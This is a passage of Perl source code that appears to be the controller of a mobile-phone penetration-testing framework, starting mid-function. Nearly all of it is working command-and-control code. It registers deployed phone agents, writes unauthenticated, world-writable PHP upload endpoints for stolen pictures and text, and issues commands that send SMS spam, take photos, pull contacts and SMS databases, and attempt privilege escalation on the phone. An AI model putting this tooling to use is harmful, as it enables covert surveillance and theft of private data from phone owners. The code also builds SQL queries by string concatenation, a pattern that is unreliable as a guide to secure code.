@rows = $sql->fetchrow_array();
$smsrow= @rows[0];
$query2 = "SELECT contacts from data where id=" . $id;
$sql = $dbh->prepare($query2);
$contacts = $sql->execute;
@rows = $sql->fetchrow_array();
$contactsrow = @rows[0];
$query3 = "SELECT picture from data where id=" . $id;
$sql = $dbh->prepare($query3);
$picture = $sql->execute;
@rows = $sql->fetchrow_array();
$picturerow = @rows[0];
$query4 = "SELECT root from data where id=" . $id;
$sql = $dbh->prepare($query4);
$root = $sql->execute;
@rows = $sql->fetchrow_array();
$rootrow = @rows[0];
print "\n\nData:\n";
print "SMS Database: " . $smsrow . "\n";
print "Contacts: " . $contactsrow . "\n";
print "Picture Location: " . $picturerow . "\n";
print "Rooted?: " . $rootrow . "\n";
print "Press <Enter> to continue";
<>;
}
sub agent_attach
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
print "Attach to a Deployed Agent:\n\n";
while (1)
{
print "This will set up handlers to control an agent that has already been deployed. You will need to fill in the correct configuration information for the agent including the control phone number,control key, and URL path. Leave an entry blank if that functionality is not present.\n\n";
print "Agent Phone Number:";
$phonenumber = <>;
print "Control Phone Number:";
$phonenumber2 = <>;
print "Agent URL Path:";
$path = <>;
print "Agent Control Key:";
$key = <>;
print "Agent Platform (Android/Blackberry/iPhone):";
$platform = <>;
print "\n\nAgent Phone Number: " . $phonenumber . "Control Phone Number: " . $phonenumber2 . "URL Path: " . $path . "Control Key: ". $key . "Platform: " . $platform . "Is this correct?(y/N):";
$correct = <>;
chomp($correct);
chomp($path);
chomp($key);
chomp($phonenumber2);
chomp($phonenumber);
if (lc($correct) eq "y")
{
if ($path ne "")
{
make_files($path);
}
database_add($phonenumber,$path,$key,$phonenumber2,$platform);
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$query2 = "SELECT id from agents where number=" . "\'" . $phonenumber . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$query2 = "SELECT id from agents where number=" . $phonenumber;
}
$sql = $dbh->prepare($query2);
$idblah = $sql->execute;
@rows = $sql->fetchrow_array();
$id = @rows[0];
$startcommand = "perl agentpoll.pl " . $path . " " . $key . " " . $id;
$pid = fork;
die "fork failed" unless defined $pid;
if ($pid ==0)
{
system($startcommand);
}
last;
}
}
}
sub make_files
{
$webserver = $Variables{"WEBSERVER"};
$path = $_[0];
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
$controlfile = $fullpath . "/control";
$command2 = "touch " . $controlfile;
system($command2);
$command3 = "chmod 777 " . $controlfile;
system($command3);
$picturefile = $fullpath . "/picture.jpg";
$command4 = "touch " . $picturefile;
system($command4);
$command5 = "chmod 777 " . $picturefile;
system($command5);
$textfile = $fullpath . "/text.txt";
$command6 = "touch " . $textfile;
system($command6);
$command7 = "chmod 777 " . $textfile;
system($command7);
$pictureupload = $fullpath . "/pictureupload.php";
$command8 = "touch " . $pictureupload;
system($command8);
$command9 = "chmod 777 " . $pictureupload;
system($command9);
$pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
open(PICFILE, ">$pictureupload");
print PICFILE $pictureuploadtext;
close(PICFILE);
$textupload = $fullpath . "/textuploader.php";
$command10 = "touch " . $textupload;
system($command10);
$command11 = "chmod 777 " . $textupload;
system($command11);
$textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
open(TEXTFILE, ">$textupload");
print TEXTFILE $textuploadtext;
close(TEXTFILE);
$controlupload = $fullpath . "/controluploader.php";
$command12 = "touch " . $controlupload;
system($command12);
$command13 = "chmod 777 " . $controlupload;
system($command13);
$controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
open(CONTROLFILE, ">$controlupload");
print CONTROLFILE $controluploadtext;
close(CONTROLFILE);
$putfile = $fullpath . "/putfunc";
$command14 = "touch " . $putfile;
system($command14);
$command15 = "chmod 777 " . $putfile;
system($command15);
}
sub database_add
{
$table = "agents";
$table2 = "data";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
$number = "\'" . $_[0] . "\'";
$path = "\'" . $_[1] . "\'";
$key = "\'" . $_[2] . "\'";
$number2 = "\'" . $_[3] . "\'";
$platform = "\'" . $_[4] . "\'";
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
$number = "\"" . $_[0] . "\"";
$path = "\"" . $_[1] . "\"";
$key = "\"" . $_[2] . "\"";
$number2 = "\"" . $_[3] . "\"";
$platform = "\"" . $_[4] . "\"";
}
$insertquery = "INSERT INTO $table (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,$number,$path,$key,$number2,$platform)";
$insertquery2 = "INSERT INTO $table2 (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)";
$sql = $dbh->prepare($insertquery);
$sql->execute;
$sql2 = $dbh->prepare($insertquery2);
$sql2->execute;
}
sub agent_control
{
$webserver = $Variables{"WEBSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\nAvailable Agents:\n\n";
$sqlserver = $Variables{"MYSQLSERVER"};
$username = $Variables{"MYSQLUSER"};
$password = $Variables{"MYSQLPASS"};
$port = $Variables{"MYSQLPORT"};
$type = $Variables{"DATABASETYPE"};
if ($type eq "postgres")
{
$dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
}
elsif ($type eq "mysql")
{
$dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
}
$rowsquery = "SELECT COUNT(*) from agents";
$sql = $dbh->prepare($rowsquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$row = @rows[0];
for($i=1; $i<=$row; $i++)
{
$selectquery = "SELECT number from agents where id=" . $i;
$sql = $dbh->prepare($selectquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$r = @rows[0];
print "\t" . $i . ".) " . $r . "\n";
}
print "\nSelect an agent to interact with or 0 to return to the previous menu\n";
print "\nspf>";
$chosenagent = <>;
if (($chosenagent == "exit") || ($chosenagent == 0))
{
last;
}
for($j=1; $j<=$row; $j++)
{
if ($chosenagent == $j)
{
$numberquery = "SELECT number from agents where id=" . $j;
$sql = $dbh->prepare($numberquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$number = @rows[0];
$keyquery = "SELECT controlkey from agents where id=" . $j;
$sql = $dbh->prepare($keyquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$key = @rows[0];
$pathquery = "SELECT path from agents where id=" . $j;
$sql = $dbh->prepare($pathquery);
$results = $sql->execute;
@rows = $sql->fetchrow_array();
$path = @rows[0];
control_agent($number,$path,$key,$j);
}
}
}
}
sub control_agent
{
while(1)
{
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"SQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
print "\n\nCommands:\n\n";
print "\t1.) Send SMS\n";
print "\t2.) Take Picture\n";
print "\t3.) Get Contacts\n";
print "\t4.) Get SMS Database\n";
print "\t5.) Privilege Escalation\n";
print "\t\nSelect a command to perform or 0 to return to the previous menu\n";
print "\nspf>";
$choice1 = <>;
chomp($choice1);
if (($choice1 == "exit") || ($choice1 == 0))
{
last;
}
if ($choice1 == 1)
{
spam($number,$path,$key,$id);
}
if ($choice1 == 3)
{
getcontacts($number,$path,$key,$id);
}
if ($choice1 == 2)
{
picture($number, $path, $key,$id);
}
if ($choice1 == 4)
{
getsms($number, $path, $key,$id);
}
if ($choice1 == 5)
{
root($number, $path, $key,$id);
}
}
}
sub spam
{
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\tSend an SMS message to another phone. Fill in the number, the message to send, and the delivery method(SMS or HTTP).\n";
print "Number:";
$sendnumber = <>;
print "\nMessage:";
$sendmessage = <>;
print "\nDelivery Method(SMS or HTTP)";
$deliverymethod = <>;
chomp($sendnumber);
chomp($sendmessage);
chomp($deliverymethod);
if ($deliverymethod eq "HTTP")
{
$command = $key . " " . "SPAM" . " " . "none" . " " . $deliverymethod . " " . $sendnumber . " " . $sendmessage . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($deliverymethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " " . "SPAM" . " " . $modem . " " . $deliverymethod . " " . $sendnumber . " " . $sendmessage . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
sub getcontacts
{
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\tGet contacts from phone with agent. Fill in the delivery method(SMS or HTTP) and return method (SMS or HTTP).\n";
print "\nDelivery Method(SMS or HTTP)";
print "\nspf>";
$deliverymethod = <>;
print "\nReturn Method(SMS or HTTP)";
print "\nspf>";
$returnmethod = <>;
chomp($deliverymethod);
chomp($returnmethod);
if ($returnmethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use
this functionality\n";
}
else
{
if ($deliverymethod eq "HTTP")
{
$command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($deliverymethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
if ($returnmethod eq "HTTP")
{
if ($deliverymethod eq "HTTP")
{
$command = $key . " CONT " . $deliverymethod . " " . $returnmethod . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($deliverymethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
}
sub picture
{
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\tTake a picture and upload it to the webserver. Will upload a message if it fails.\n";
print "Delivery Method (SMS or HTTP)";
print "\nspf>";
$delivery = <>;
chomp($delivery);
if ($delivery eq "HTTP")
{
$command = $key . " PICT HTTP\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($delivery eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " PICT HTTP " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
sub getsms
{
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
while(1)
{
print "\n\tGet last 10 sms from phone with agent. Fill in the delivery method(SMS or HTTP) and return method (SMS or HTTP).\n";
print "\nDelivery Method(SMS or HTTP)";
print "\nspf>";
$deliverymethod = <>;
print "\nReturn Method(SMS or HTTP)";
print "\nspf>";
$returnmethod = <>;
chomp($deliverymethod);
chomp($returnmethod);
if ($returnmethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " " . "SMSS" . " " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
if ($deliverymethod eq "HTTP")
{
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($deliverymethod eq "SMS")
{
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
if ($returnmethod eq "HTTP")
{
if ($deliverymethod eq "HTTP")
{
$command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($deliverymethod eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
}
sub root
{
$number = $_[0];
$path = $_[1];
$key = $_[2];
$id = $_[3];
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
print "ROOT\n";
while(1)
{
print "\n\tTry a privilege escalation exploit.\n";
print "Delivery Method (SMS or HTTP)";
print "\nspf>";
$delivery = <>;
chomp($delivery);
if ($delivery eq "HTTP")
{
$command = $key . " ROOT HTTP\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
if ($delivery eq "SMS")
{
$modem = get_modem();
if ($modem == 0)
{
print "\nNo modems found. Attach a modem to use this functionality\n";
}
else
{
$command = $key . " " . "ROOT HTTP" . " " . $modem . "\n";
$control = $webserver . $path . "/putfunc";
open(CONTROLFILE, ">>$control");
print CONTROLFILE $command;
close(CONTROLFILE);
last;
}
}
}
}
Jump to Line
Something went wrong with that request. Please try again.